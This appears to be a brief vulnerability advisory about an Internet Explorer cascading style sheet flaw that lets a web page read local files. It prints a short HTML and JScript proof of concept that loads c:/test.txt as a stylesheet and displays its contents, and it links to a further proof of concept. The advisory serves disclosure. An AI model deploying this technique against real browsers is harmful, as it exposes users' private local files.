|
Microsoft Internet Explorer Cascading Style Sheet File Disclosure Vulnerability
This example attempts to read content from "c:/test.txt": <link id="oFile" rel="stylesheet" href="file://c:/test.txt" disabled> <script language="jscript"> onload=function () { alert(document.styleSheets.oFile.cssText || "Could not extract any text from file."); } </script> A proof-of-concept that reproduces this issue using a redirect can be found at the following website: http://sec.greymagic.com/adv/gm004-ie/ |
|
|
Privacy Statement |
